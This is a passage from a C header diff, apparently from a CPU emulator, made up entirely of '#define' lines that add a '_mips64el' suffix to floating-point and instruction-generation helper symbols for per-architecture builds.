float32_to_int16_mips64el +#define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_mips64el +#define float32_to_int32 float32_to_int32_mips64el +#define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_mips64el +#define float32_to_int64 float32_to_int64_mips64el +#define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_mips64el +#define float32_to_uint16 float32_to_uint16_mips64el +#define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_mips64el +#define float32_to_uint32 float32_to_uint32_mips64el +#define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_mips64el +#define float32_to_uint64 float32_to_uint64_mips64el +#define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_mips64el +#define float32_unordered float32_unordered_mips64el +#define float32_unordered_quiet float32_unordered_quiet_mips64el +#define float64_abs float64_abs_mips64el +#define float64_add float64_add_mips64el +#define float64_chs float64_chs_mips64el +#define float64_compare float64_compare_mips64el +#define float64_compare_internal float64_compare_internal_mips64el +#define float64_compare_quiet float64_compare_quiet_mips64el +#define float64_default_nan float64_default_nan_mips64el +#define float64_div float64_div_mips64el +#define float64_eq float64_eq_mips64el +#define float64_eq_quiet float64_eq_quiet_mips64el +#define float64_is_any_nan float64_is_any_nan_mips64el +#define float64_is_infinity float64_is_infinity_mips64el +#define float64_is_neg float64_is_neg_mips64el +#define float64_is_quiet_nan float64_is_quiet_nan_mips64el +#define float64_is_signaling_nan float64_is_signaling_nan_mips64el +#define float64_is_zero float64_is_zero_mips64el +#define float64_le float64_le_mips64el +#define float64_le_quiet float64_le_quiet_mips64el +#define float64_log2 float64_log2_mips64el +#define float64_lt float64_lt_mips64el +#define float64_lt_quiet float64_lt_quiet_mips64el +#define float64_max float64_max_mips64el +#define float64_maxnum float64_maxnum_mips64el +#define float64_maxnummag float64_maxnummag_mips64el +#define float64_maybe_silence_nan float64_maybe_silence_nan_mips64el +#define float64_min float64_min_mips64el +#define float64_minmax float64_minmax_mips64el +#define float64_minnum float64_minnum_mips64el +#define float64_minnummag float64_minnummag_mips64el +#define float64_mul float64_mul_mips64el +#define float64_muladd float64_muladd_mips64el +#define float64_rem float64_rem_mips64el +#define float64_round_to_int float64_round_to_int_mips64el +#define float64_scalbn float64_scalbn_mips64el +#define float64_set_sign float64_set_sign_mips64el +#define float64_sqrt float64_sqrt_mips64el +#define float64_squash_input_denormal float64_squash_input_denormal_mips64el +#define float64_sub float64_sub_mips64el +#define float64ToCommonNaN float64ToCommonNaN_mips64el +#define float64_to_float128 float64_to_float128_mips64el +#define float64_to_float16 float64_to_float16_mips64el +#define float64_to_float32 float64_to_float32_mips64el +#define float64_to_floatx80 float64_to_floatx80_mips64el +#define float64_to_int16 float64_to_int16_mips64el +#define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_mips64el +#define float64_to_int32 float64_to_int32_mips64el +#define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_mips64el +#define float64_to_int64 float64_to_int64_mips64el +#define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_mips64el +#define float64_to_uint16 float64_to_uint16_mips64el +#define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_mips64el +#define float64_to_uint32 float64_to_uint32_mips64el +#define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_mips64el +#define float64_to_uint64 float64_to_uint64_mips64el +#define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_mips64el +#define float64_trunc_to_int float64_trunc_to_int_mips64el +#define float64_unordered float64_unordered_mips64el +#define float64_unordered_quiet float64_unordered_quiet_mips64el +#define float_raise float_raise_mips64el +#define floatx80_add floatx80_add_mips64el +#define floatx80_compare floatx80_compare_mips64el +#define floatx80_compare_internal floatx80_compare_internal_mips64el +#define floatx80_compare_quiet floatx80_compare_quiet_mips64el +#define floatx80_default_nan floatx80_default_nan_mips64el +#define floatx80_div floatx80_div_mips64el +#define floatx80_eq floatx80_eq_mips64el +#define floatx80_eq_quiet floatx80_eq_quiet_mips64el +#define floatx80_is_quiet_nan floatx80_is_quiet_nan_mips64el +#define floatx80_is_signaling_nan floatx80_is_signaling_nan_mips64el +#define floatx80_le floatx80_le_mips64el +#define floatx80_le_quiet floatx80_le_quiet_mips64el +#define floatx80_lt floatx80_lt_mips64el +#define floatx80_lt_quiet floatx80_lt_quiet_mips64el +#define floatx80_maybe_silence_nan floatx80_maybe_silence_nan_mips64el +#define floatx80_mul floatx80_mul_mips64el +#define floatx80_rem floatx80_rem_mips64el +#define floatx80_round_to_int floatx80_round_to_int_mips64el +#define floatx80_scalbn floatx80_scalbn_mips64el +#define floatx80_sqrt floatx80_sqrt_mips64el +#define floatx80_sub floatx80_sub_mips64el +#define floatx80ToCommonNaN floatx80ToCommonNaN_mips64el +#define floatx80_to_float128 floatx80_to_float128_mips64el +#define floatx80_to_float32 floatx80_to_float32_mips64el +#define floatx80_to_float64 floatx80_to_float64_mips64el +#define floatx80_to_int32 floatx80_to_int32_mips64el +#define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_mips64el +#define floatx80_to_int64 floatx80_to_int64_mips64el +#define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_mips64el +#define floatx80_unordered floatx80_unordered_mips64el +#define floatx80_unordered_quiet floatx80_unordered_quiet_mips64el +#define flush_icache_range flush_icache_range_mips64el +#define format_string format_string_mips64el +#define fp_decode_rm fp_decode_rm_mips64el +#define frame_dummy frame_dummy_mips64el +#define free_range free_range_mips64el +#define fstat64 fstat64_mips64el +#define futex_wait futex_wait_mips64el +#define futex_wake futex_wake_mips64el +#define gen_aa32_ld16s gen_aa32_ld16s_mips64el +#define gen_aa32_ld16u gen_aa32_ld16u_mips64el +#define gen_aa32_ld32u gen_aa32_ld32u_mips64el +#define gen_aa32_ld64 gen_aa32_ld64_mips64el +#define gen_aa32_ld8s gen_aa32_ld8s_mips64el +#define gen_aa32_ld8u gen_aa32_ld8u_mips64el +#define gen_aa32_st16 gen_aa32_st16_mips64el +#define gen_aa32_st32 gen_aa32_st32_mips64el +#define gen_aa32_st64 gen_aa32_st64_mips64el +#define gen_aa32_st8 gen_aa32_st8_mips64el +#define gen_adc gen_adc_mips64el +#define gen_adc_CC gen_adc_CC_mips64el +#define gen_add16 gen_add16_mips64el +#define gen_add_carry gen_add_carry_mips64el +#define gen_add_CC gen_add_CC_mips64el +#define gen_add_datah_offset gen_add_datah_offset_mips64el +#define gen_add_data_offset gen_add_data_offset_mips64el +#define gen_addq gen_addq_mips64el +#define gen_addq_lo gen_addq_lo_mips64el +#define gen_addq_msw gen_addq_msw_mips64el +#define gen_arm_parallel_addsub gen_arm_parallel_addsub_mips64el +#define gen_arm_shift_im gen_arm_shift_im_mips64el +#define gen_arm_shift_reg gen_arm_shift_reg_mips64el +#define gen_bx gen_bx_mips64el +#define gen_bx_im gen_bx_im_mips64el +#define gen_clrex gen_clrex_mips64el +#define generate_memory_topology generate_memory_topology_mips64el +#define generic_timer_cp_reginfo generic_timer_cp_reginfo_mips64el +#define gen_exception gen_exception_mips64el +#define gen_exception_insn gen_exception_insn_mips64el +#define gen_exception_internal gen_exception_internal_mips64el +#define gen_exception_internal_insn gen_exception_internal_insn_mips64el +#define gen_exception_return gen_exception_return_mips64el +#define gen_goto_tb gen_goto_tb_mips64el +#define gen_helper_access_check_cp_reg gen_helper_access_check_cp_reg_mips64el +#define gen_helper_add_saturate gen_helper_add_saturate_mips64el +#define gen_helper_add_setq gen_helper_add_setq_mips64el +#define gen_helper_clear_pstate_ss gen_helper_clear_pstate_ss_mips64el +#define gen_helper_clz32 gen_helper_clz32_mips64el +#define gen_helper_clz64 gen_helper_clz64_mips64el +#define gen_helper_clz_arm gen_helper_clz_arm_mips64el +#define gen_helper_cpsr_read gen_helper_cpsr_read_mips64el +#define gen_helper_cpsr_write gen_helper_cpsr_write_mips64el +#define gen_helper_crc32_arm gen_helper_crc32_arm_mips64el +#define gen_helper_crc32c gen_helper_crc32c_mips64el +#define gen_helper_crypto_aese gen_helper_crypto_aese_mips64el +#define gen_helper_crypto_aesmc gen_helper_crypto_aesmc_mips64el +#define gen_helper_crypto_sha1_3reg gen_helper_crypto_sha1_3reg_mips64el +#define gen_helper_crypto_sha1h gen_helper_crypto_sha1h_mips64el +#define gen_helper_crypto_sha1su1 gen_helper_crypto_sha1su1_mips64el +#define gen_helper_crypto_sha256h gen_helper_crypto_sha256h_mips64el +#define gen_helper_crypto_sha256h2 gen_helper_crypto_sha256h2_mips64el +#define gen_helper_crypto_sha256su0 gen_helper_crypto_sha256su0_mips64el +#define gen_helper_crypto_sha256su1 gen_helper_crypto_sha256su1_mips64el +#define gen_helper_double_saturate gen_helper_double_saturate_mips64el +#define gen_helper_exception_internal gen_helper_exception_internal_mips64el +#define gen_helper_exception_with_syndrome gen_helper_exception_with_syndrome_mips64el +#define gen_helper_get_cp_reg gen_helper_get_cp_reg_mips64el +#define gen_helper_get_cp_reg64 gen_helper_get_cp_reg64_mips64el +#define gen_helper_get_r13_banked gen_helper_get_r13_banked_mips64el +#define gen_helper_get_user_reg gen_helper_get_user_reg_mips64el +#define gen_helper_iwmmxt_addcb gen_helper_iwmmxt_addcb_mips64el +#define gen_helper_iwmmxt_addcl gen_helper_iwmmxt_addcl_mips64el +#define gen_helper_iwmmxt_addcw gen_helper_iwmmxt_addcw_mips64el +#define gen_helper_iwmmxt_addnb gen_helper_iwmmxt_addnb_mips64el +#define gen_helper_iwmmxt_addnl gen_helper_iwmmxt_addnl_mips64el +#define gen_helper_iwmmxt_addnw gen_helper_iwmmxt_addnw_mips64el +#define gen_helper_iwmmxt_addsb gen_helper_iwmmxt_addsb_mips64el +#define gen_helper_iwmmxt_addsl gen_helper_iwmmxt_addsl_mips64el +#define gen_helper_iwmmxt_addsw gen_helper_iwmmxt_addsw_mips64el +#define gen_helper_iwmmxt_addub gen_helper_iwmmxt_addub_mips64el +#define gen_helper_iwmmxt_addul gen_helper_iwmmxt_addul_mips64el +#define gen_helper_iwmmxt_adduw gen_helper_iwmmxt_adduw_mips64el +#define gen_helper_iwmmxt_align gen_helper_iwmmxt_align_mips64el +#define gen_helper_iwmmxt_avgb0 gen_helper_iwmmxt_avgb0_mips64el +#define gen_helper_iwmmxt_avgb1 gen_helper_iwmmxt_avgb1_mips64el +#define gen_helper_iwmmxt_avgw0 gen_helper_iwmmxt_avgw0_mips64el +#define gen_helper_iwmmxt_avgw1 gen_helper_iwmmxt_avgw1_mips64el +#define gen_helper_iwmmxt_bcstb gen_helper_iwmmxt_bcstb_mips64el +#define gen_helper_iwmmxt_bcstl gen_helper_iwmmxt_bcstl_mips64el +#define gen_helper_iwmmxt_bcstw gen_helper_iwmmxt_bcstw_mips64el +#define gen_helper_iwmmxt_cmpeqb gen_helper_iwmmxt_cmpeqb_mips64el +#define gen_helper_iwmmxt_cmpeql gen_helper_iwmmxt_cmpeql_mips64el +#define gen_helper_iwmmxt_cmpeqw gen_helper_iwmmxt_cmpeqw_mips64el +#define gen_helper_iwmmxt_cmpgtsb gen_helper_iwmmxt_cmpgtsb_mips64el +#define gen_helper_iwmmxt_cmpgtsl gen_helper_iwmmxt_cmpgtsl_mips64el +#define gen_helper_iwmmxt_cmpgtsw gen_helper_iwmmxt_cmpgtsw_mips64el +#define gen_helper_iwmmxt_cmpgtub gen_helper_iwmmxt_cmpgtub_mips64el +#define gen_helper_iwmmxt_cmpgtul gen_helper_iwmmxt_cmpgtul_mips64el +#define gen_helper_iwmmxt_cmpgtuw gen_helper_iwmmxt_cmpgtuw_mips64el +#define gen_helper_iwmmxt_insr gen_helper_iwmmxt_insr_mips64el +#define gen_helper_iwmmxt_macsw gen_helper_iwmmxt_macsw_mips64el +#define gen_helper_iwmmxt_macuw gen_helper_iwmmxt_macuw_mips64el +#define gen_helper_iwmmxt_maddsq gen_helper_iwmmxt_maddsq_mips64el +#define gen_helper_iwmmxt_madduq gen_helper_iwmmxt_madduq_mips64el +#define gen_helper_iwmmxt_maxsb gen_helper_iwmmxt_maxsb_mips64el +#define gen_helper_iwmmxt_maxsl gen_helper_iwmmxt_maxsl_mips64el +#define gen_helper_iwmmxt_maxsw gen_helper_iwmmxt_maxsw_mips64el +#define gen_helper_iwmmxt_maxub gen_helper_iwmmxt_maxub_mips64el +#define gen_helper_iwmmxt_maxul gen_helper_iwmmxt_maxul_mips64el +#define gen_helper_iwmmxt_maxuw gen_helper_iwmmxt_maxuw_mips64el +#define gen_helper_iwmmxt_minsb gen_helper_iwmmxt_minsb_mips64el +#define gen_helper_iwmmxt_minsl gen_helper_iwmmxt_minsl_mips64el +#define gen_helper_iwmmxt_minsw gen_helper_iwmmxt_minsw_mips64el +#define gen_helper_iwmmxt_minub gen_helper_iwmmxt_minub_mips64el +#define gen_helper_iwmmxt_minul gen_helper_iwmmxt_minul_mips64el +#define gen_helper_iwmmxt_minuw gen_helper_iwmmxt_minuw_mips64el +#define gen_helper_iwmmxt_msbb gen_helper_iwmmxt_msbb_mips64el +#define gen_helper_iwmmxt_msbl gen_helper_iwmmxt_msbl_mips64el +#define gen_helper_iwmmxt_msbw gen_helper_iwmmxt_msbw_mips64el +#define gen_helper_iwmmxt_muladdsl gen_helper_iwmmxt_muladdsl_mips64el +#define gen_helper_iwmmxt_muladdsw gen_helper_iwmmxt_muladdsw_mips64el +#define gen_helper_iwmmxt_muladdswl gen_helper_iwmmxt_muladdswl_mips64el +#define gen_helper_iwmmxt_mulshw gen_helper_iwmmxt_mulshw_mips64el +#define gen_helper_iwmmxt_mulslw gen_helper_iwmmxt_mulslw_mips64el +#define gen_helper_iwmmxt_muluhw gen_helper_iwmmxt_muluhw_mips64el +#define gen_helper_iwmmxt_mululw gen_helper_iwmmxt_mululw_mips64el +#define gen_helper_iwmmxt_packsl gen_helper_iwmmxt_packsl_mips64el +#define gen_helper_iwmmxt_packsq gen_helper_iwmmxt_packsq_mips64el +#define gen_helper_iwmmxt_packsw gen_helper_iwmmxt_packsw_mips64el +#define gen_helper_iwmmxt_packul gen_helper_iwmmxt_packul_mips64el +#define gen_helper_iwmmxt_packuq gen_helper_iwmmxt_packuq_mips64el +#define gen_helper_iwmmxt_packuw gen_helper_iwmmxt_packuw_mips64el +#define gen_helper_iwmmxt_rorl gen_helper_iwmmxt_rorl_mips64el +#define gen_helper_iwmmxt_rorq gen_helper_iwmmxt_rorq_mips64el +#define gen_helper_iwmmxt_rorw gen_helper_iwmmxt_rorw_mips64el +#define gen_helper_iwmmxt_sadb gen_helper_iwmmxt_sadb_mips64el +#define gen_helper_iwmmxt_sadw gen_helper_iwmmxt_sadw_mips64el +#define gen_helper_iwmmxt_setpsr_nz gen_helper_iwmmxt_setpsr_nz_mips64el +#define gen_helper_iwmmxt_shufh gen_helper_iwmmxt_shufh_mips64el +#define gen_helper_iwmmxt_slll gen_helper_iwmmxt_slll_mips64el +#define gen_helper_iwmmxt_sllq gen_helper_iwmmxt_sllq_mips64el +#define gen_helper_iwmmxt_sllw gen_helper_iwmmxt_sllw_mips64el +#define gen_helper_iwmmxt_sral gen_helper_iwmmxt_sral_mips64el +#define gen_helper_iwmmxt_sraq gen_helper_iwmmxt_sraq_mips64el +#define gen_helper_iwmmxt_sraw gen_helper_iwmmxt_sraw_mips64el +#define gen_helper_iwmmxt_srll gen_helper_iwmmxt_srll_mips64el +#define gen_helper_iwmmxt_srlq gen_helper_iwmmxt_srlq_mips64el +#define gen_helper_iwmmxt_srlw gen_helper_iwmmxt_srlw_mips64el +#define gen_helper_iwmmxt_subnb gen_helper_iwmmxt_subnb_mips64el +#define gen_helper_iwmmxt_subnl gen_helper_iwmmxt_subnl_mips64el +#define gen_helper_iwmmxt_subnw gen_helper_iwmmxt_subnw_mips64el +#define gen_helper_iwmmxt_subsb gen_helper_iwmmxt_subsb_mips64el +#define gen_helper_iwmmxt_subsl gen_helper_iwmmxt_subsl_mips64el +#define gen_helper_iwmmxt_subsw gen_helper_iwmmxt_subsw_mips64el +#define gen_helper_iwmmxt_subub gen_helper_iwmmxt_subub_mips64el +#define gen_helper_iwmmxt_subul gen_helper_iwmmxt_subul_mips64el +#define gen_helper_iwmmxt_subuw gen_helper_iwmmxt_subuw_mips64el +#define gen_helper_iwmmxt_unpackhb gen_helper_iwmmxt_unpackhb_mips64el +#define gen_helper_iwmmxt_unpackhl gen_helper_iwmmxt_unpackhl_mips64el +#define gen_helper_iwmmxt_unpackhsb gen_helper_iwmmxt_unpackhsb_mips64el +#define gen_helper_iwmmxt_unpackhsl gen_helper_iwmmxt_unpackhsl_mips64el +#define gen_helper_iwmmxt_unpackhsw gen_helper_iwmmxt_unpackhsw_mips64el +#define gen_helper_iwmmxt_unpackhub gen_helper_iwmmxt_unpackhub_mips64el +#define gen_helper_iwmmxt_unpackhul gen_helper_iwmmxt_unpackhul_mips64el +#define gen_helper_iwmmxt_unpackhuw gen_helper_iwmmxt_unpackhuw_mips64el +#define gen_helper_iwmmxt_unpackhw gen_helper_iwmmxt_unpackhw_mips64el +#define gen_helper_iwmmxt_unpacklb gen_helper_iwmmxt_unpacklb_mips64el +#define gen_helper_iwmmxt_unpackll gen_helper_iwmmxt_unpackll_mips64el +#define gen_helper_iwmmxt_unpacklsb gen_helper_iwmmxt_unpacklsb_mips64el +#define gen_helper_iwmmxt_unpacklsl gen_helper_iwmmxt_unpacklsl_mips64el +#define gen_helper_iwmmxt_unpacklsw gen_helper_iwmmxt_unpacklsw_mips64el +#define gen_helper_iwmmxt_unpacklub gen_helper_iwmmxt_unpacklub_mips64el +#define gen_helper_iwmmxt_unpacklul gen_helper_iwmmxt_unpacklul_mips64el +#define gen_helper_iwmmxt_unpackluw gen_helper_iwmmxt_unpackluw_mips64el +#define gen_helper_iwmmxt_unpacklw gen_helper_iwmmxt_unpacklw_mips64el +#define gen_helper_neon_abd_f32 gen_helper_neon_abd_f32_mips64el +#define gen_helper_neon_abdl_s16 gen_helper_neon_abdl_s16_mips64el +#define gen_helper_neon_abdl_s32 gen_helper_neon_abdl_s32_mips64el +#define gen_helper_neon_abdl_s64 gen_helper_neon_abdl_s64_mips64el +#define gen_helper_neon_abdl_u16 gen_helper_neon_abdl_u16_mips64el +#define gen_helper_neon_abdl_u32 gen_helper_neon_abdl_u32_mips64el +#define gen_helper_neon_abdl_u64 gen_helper_neon_abdl_u64_mips64el +#define gen_helper_neon_abd_s16 gen_helper_neon_abd_s16_mips64el +#define gen_helper_neon_abd_s32 gen_helper_neon_abd_s32_mips64el +#define gen_helper_neon_abd_s8 gen_helper_neon_abd_s8_mips64el +#define gen_helper_neon_abd_u16 gen_helper_neon_abd_u16_mips64el +#define gen_helper_neon_abd_u32 gen_helper_neon_abd_u32_mips64el +#define gen_helper_neon_abd_u8 gen_helper_neon_abd_u8_mips64el +#define gen_helper_neon_abs_s16 gen_helper_neon_abs_s16_mips64el +#define gen_helper_neon_abs_s8 gen_helper_neon_abs_s8_mips64el +#define gen_helper_neon_acge_f32 gen_helper_neon_acge_f32_mips64el +#define gen_helper_neon_acgt_f32 gen_helper_neon_acgt_f32_mips64el +#define gen_helper_neon_addl_saturate_s32 gen_helper_neon_addl_saturate_s32_mips64el +#define gen_helper_neon_addl_saturate_s64 gen_helper_neon_addl_saturate_s64_mips64el +#define gen_helper_neon_addl_u16 gen_helper_neon_addl_u16_mips64el +#define gen_helper_neon_addl_u32 gen_helper_neon_addl_u32_mips64el +#define gen_helper_neon_add_u16 gen_helper_neon_add_u16_mips64el +#define gen_helper_neon_add_u8 gen_helper_neon_add_u8_mips64el +#define gen_helper_neon_ceq_f32 gen_helper_neon_ceq_f32_mips64el +#define gen_helper_neon_ceq_u16 gen_helper_neon_ceq_u16_mips64el +#define gen_helper_neon_ceq_u32 gen_helper_neon_ceq_u32_mips64el +#define gen_helper_neon_ceq_u8 gen_helper_neon_ceq_u8_mips64el +#define gen_helper_neon_cge_f32 gen_helper_neon_cge_f32_mips64el +#define gen_helper_neon_cge_s16 gen_helper_neon_cge_s16_mips64el +#define gen_helper_neon_cge_s32 gen_helper_neon_cge_s32_mips64el +#define gen_helper_neon_cge_s8 gen_helper_neon_cge_s8_mips64el +#define gen_helper_neon_cge_u16 gen_helper_neon_cge_u16_mips64el +#define gen_helper_neon_cge_u32 gen_helper_neon_cge_u32_mips64el +#define gen_helper_neon_cge_u8 gen_helper_neon_cge_u8_mips64el +#define gen_helper_neon_cgt_f32 gen_helper_neon_cgt_f32_mips64el +#define gen_helper_neon_cgt_s16 gen_helper_neon_cgt_s16_mips64el +#define gen_helper_neon_cgt_s32 gen_helper_neon_cgt_s32_mips64el +#define gen_helper_neon_cgt_s8 gen_helper_neon_cgt_s8_mips64el +#define gen_helper_neon_cgt_u16 gen_helper_neon_cgt_u16_mips64el +#define gen_helper_neon_cgt_u32 gen_helper_neon_cgt_u32_mips64el +#define gen_helper_neon_cgt_u8 gen_helper_neon_cgt_u8_mips64el +#define gen_helper_neon_cls_s16 gen_helper_neon_cls_s16_mips64el +#define gen_helper_neon_cls_s32 gen_helper_neon_cls_s32_mips64el +#define gen_helper_neon_cls_s8 gen_helper_neon_cls_s8_mips64el +#define gen_helper_neon_clz_u16 gen_helper_neon_clz_u16_mips64el +#define gen_helper_neon_clz_u8 gen_helper_neon_clz_u8_mips64el +#define gen_helper_neon_cnt_u8 gen_helper_neon_cnt_u8_mips64el +#define gen_helper_neon_fcvt_f16_to_f32 gen_helper_neon_fcvt_f16_to_f32_mips64el +#define gen_helper_neon_fcvt_f32_to_f16 gen_helper_neon_fcvt_f32_to_f16_mips64el +#define gen_helper_neon_hadd_s16 gen_helper_neon_hadd_s16_mips64el +#define gen_helper_neon_hadd_s32 gen_helper_neon_hadd_s32_mips64el +#define gen_helper_neon_hadd_s8 gen_helper_neon_hadd_s8_mips64el +#define gen_helper_neon_hadd_u16 gen_helper_neon_hadd_u16_mips64el +#define gen_helper_neon_hadd_u32 gen_helper_neon_hadd_u32_mips64el +#define gen_helper_neon_hadd_u8 gen_helper_neon_hadd_u8_mips64el +#define gen_helper_neon_hsub_s16 gen_helper_neon_hsub_s16_mips64el +#define gen_helper_neon_hsub_s32 gen_helper_neon_hsub_s32_mips64el +#define gen_helper_neon_hsub_s8 gen_helper_neon_hsub_s8_mips64el +#define gen_helper_neon_hsub_u16 gen_helper_neon_hsub_u16_mips64el +#define gen_helper_neon_hsub_u32 gen_helper_neon_hsub_u32_mips64el +#define gen_helper_neon_hsub_u8 gen_helper_neon_hsub_u8_mips64el +#define gen_helper_neon_max_s16 gen_helper_neon_max_s16_mips64el +#define gen_helper_neon_max_s32 gen_helper_neon_max_s32_mips64el +#define gen_helper_neon_max_s8 gen_helper_neon_max_s8_mips64el +#define gen_helper_neon_max_u16 gen_helper_neon_max_u16_mips64el +#define gen_helper_neon_max_u32 gen_helper_neon_max_u32_mips64el +#define gen_helper_neon_max_u8 gen_helper_neon_max_u8_mips64el +#define gen_helper_neon_min_s16 gen_helper_neon_min_s16_mips64el +#define gen_helper_neon_min_s32 gen_helper_neon_min_s32_mips64el +#define gen_helper_neon_min_s8 gen_helper_neon_min_s8_mips64el +#define gen_helper_neon_min_u16 gen_helper_neon_min_u16_mips64el +#define gen_helper_neon_min_u32 gen_helper_neon_min_u32_mips64el +#define gen_helper_neon_min_u8 gen_helper_neon_min_u8_mips64el +#define gen_helper_neon_mull_p8 gen_helper_neon_mull_p8_mips64el +#define gen_helper_neon_mull_s16 gen_helper_neon_mull_s16_mips64el +#define gen_helper_neon_mull_s8 gen_helper_neon_mull_s8_mips64el +#define gen_helper_neon_mull_u16 gen_helper_neon_mull_u16_mips64el +#define gen_helper_neon_mull_u8 gen_helper_neon_mull_u8_mips64el +#define gen_helper_neon_mul_p8 gen_helper_neon_mul_p8_mips64el +#define gen_helper_neon_mul_u16 gen_helper_neon_mul_u16_mips64el +#define gen_helper_neon_mul_u8 gen_helper_neon_mul_u8_mips64el +#define gen_helper_neon_narrow_high_u16 gen_helper_neon_narrow_high_u16_mips64el +#define gen_helper_neon_narrow_high_u8 gen_helper_neon_narrow_high_u8_mips64el +#define gen_helper_neon_narrow_round_high_u16 gen_helper_neon_narrow_round_high_u16_mips64el +#define gen_helper_neon_narrow_round_high_u8 gen_helper_neon_narrow_round_high_u8_mips64el +#define gen_helper_neon_narrow_sat_s16 gen_helper_neon_narrow_sat_s16_mips64el +#define gen_helper_neon_narrow_sat_s32 gen_helper_neon_narrow_sat_s32_mips64el +#define gen_helper_neon_narrow_sat_s8 gen_helper_neon_narrow_sat_s8_mips64el +#define gen_helper_neon_narrow_sat_u16 gen_helper_neon_narrow_sat_u16_mips64el +#define gen_helper_neon_narrow_sat_u32 gen_helper_neon_narrow_sat_u32_mips64el +#define gen_helper_neon_narrow_sat_u8 gen_helper_neon_narrow_sat_u8_mips64el +#define gen_helper_neon_narrow_u16 gen_helper_neon_narrow_u16_mips64el +#define gen_helper_neon_narrow_u8 gen_helper_neon_narrow_u8_mips64el +#define gen_helper_neon_negl_u16 gen_helper_neon_negl_u16_mips64el +#define gen_helper_neon_negl_u32 gen_helper_neon_negl_u32_mips64el +#define gen_helper_neon_paddl_u16 gen_helper_neon_paddl_u16_mips64el +#define gen_helper_neon_paddl_u32 gen_helper_neon_paddl_u32_mips64el +#define gen_helper_neon_padd_u16 gen_helper_neon_padd_u16_mips64el +#define gen_helper_neon_padd_u8 gen_helper_neon_padd_u8_mips64el +#define gen_helper_neon_pmax_s16 gen_helper_neon_pmax_s16_mips64el +#define gen_helper_neon_pmax_s8 gen_helper_neon_pmax_s8_mips64el +#define gen_helper_neon_pmax_u16 gen_helper_neon_pmax_u16_mips64el +#define gen_helper_neon_pmax_u8 gen_helper_neon_pmax_u8_mips64el +#define gen_helper_neon_pmin_s16 gen_helper_neon_pmin_s16_mips64el +#define gen_helper_neon_pmin_s8 gen_helper_neon_pmin_s8_mips64el +#define gen_helper_neon_pmin_u16 gen_helper_neon_pmin_u16_mips64el +#define gen_helper_neon_pmin_u8 gen_helper_neon_pmin_u8_mips64el +#define gen_helper_neon_pmull_64_hi gen_helper_neon_pmull_64_hi_mips64el +#define gen_helper_neon_pmull_64_lo gen_helper_neon_pmull_64_lo_mips64el +#define gen_helper_neon_qabs_s16 gen_helper_neon_qabs_s16_mips64el +#define gen_helper_neon_qabs_s32 gen_helper_neon_qabs_s32_mips64el +#define gen_helper_neon_qabs_s8 gen_helper_neon_qabs_s8_mips64el +#define gen_helper_neon_qadd_s16 gen_helper_neon_qadd_s16_mips64el +#define gen_helper_neon_qadd_s32 gen_helper_neon_qadd_s32_mips64el +#define gen_helper_neon_qadd_s64 gen_helper_neon_qadd_s64_mips64el +#define gen_helper_neon_qadd_s8 gen_helper_neon_qadd_s8_mips64el +#define gen_helper_neon_qadd_u16 gen_helper_neon_qadd_u16_mips64el +#define gen_helper_neon_qadd_u32 gen_helper_neon_qadd_u32_mips64el +#define gen_helper_neon_qadd_u64 gen_helper_neon_qadd_u64_mips64el +#define gen_helper_neon_qadd_u8 gen_helper_neon_qadd_u8_mips64el +#define gen_helper_neon_qdmulh_s16 gen_helper_neon_qdmulh_s16_mips64el +#define gen_helper_neon_qdmulh_s32 gen_helper_neon_qdmulh_s32_mips64el +#define gen_helper_neon_qneg_s16 gen_helper_neon_qneg_s16_mips64el +#define gen_helper_neon_qneg_s32 gen_helper_neon_qneg_s32_mips64el +#define gen_helper_neon_qneg_s8 gen_helper_neon_qneg_s8_mips64el +#define gen_helper_neon_qrdmulh_s16 gen_helper_neon_qrdmulh_s16_mips64el +#define gen_helper_neon_qrdmulh_s32 gen_helper_neon_qrdmulh_s32_mips64el +#define gen_helper_neon_qrshl_s16 gen_helper_neon_qrshl_s16_mips64el +#define gen_helper_neon_qrshl_s32 gen_helper_neon_qrshl_s32_mips64el +#define gen_helper_neon_qrshl_s64 gen_helper_neon_qrshl_s64_mips64el +#define gen_helper_neon_qrshl_s8 gen_helper_neon_qrshl_s8_mips64el +#define gen_helper_neon_qrshl_u16 gen_helper_neon_qrshl_u16_mips64el +#define gen_helper_neon_qrshl_u32 gen_helper_neon_qrshl_u32_mips64el +#define gen_helper_neon_qrshl_u64 gen_helper_neon_qrshl_u64_mips64el +#define gen_helper_neon_qrshl_u8 gen_helper_neon_qrshl_u8_mips64el +#define gen_helper_neon_qshl_s16 gen_helper_neon_qshl_s16_mips64el +#define gen_helper_neon_qshl_s32 gen_helper_neon_qshl_s32_mips64el +#define gen_helper_neon_qshl_s64 gen_helper_neon_qshl_s64_mips64el +#define gen_helper_neon_qshl_s8 gen_helper_neon_qshl_s8_mips64el +#define gen_helper_neon_qshl_u16 gen_helper_neon_qshl_u16_mips64el +#define gen_helper_neon_qshl_u32 gen_helper_neon_qshl_u32_mips64el +#define gen_helper_neon_qshl_u64 gen_helper_neon_qshl_u64_mips64el +#define gen_helper_neon_qshl_u8 gen_helper_neon_qshl_u8_mips64el +#define gen_helper_neon_qshlu_s16 gen_helper_neon_qshlu_s16_mips64el +#define gen_helper_neon_qshlu_s32 gen_helper_neon_qshlu_s32_mips64el +#define gen_helper_neon_qshlu_s64 gen_helper_neon_qshlu_s64_mips64el +#define gen_helper_neon_qshlu_s8 gen_helper_neon_qshlu_s8_mips64el +#define gen_helper_neon_qsub_s16 gen_helper_neon_qsub_s16_mips64el +#define gen_helper_neon_qsub_s32 gen_helper_neon_qsub_s32_mips64el +#define gen_helper_neon_qsub_s64 gen_helper_neon_qsub_s64_mips64el +#define gen_helper_neon_qsub_s8 gen_helper_neon_qsub_s8_mips64el +#define gen_helper_neon_qsub_u16 gen_helper_neon_qsub_u16_mips64el +#define gen_helper_neon_qsub_u32 gen_helper_neon_qsub_u32_mips64el +#define gen_helper_neon_qsub_u64 gen_helper_neon_qsub_u64_mips64el +#define 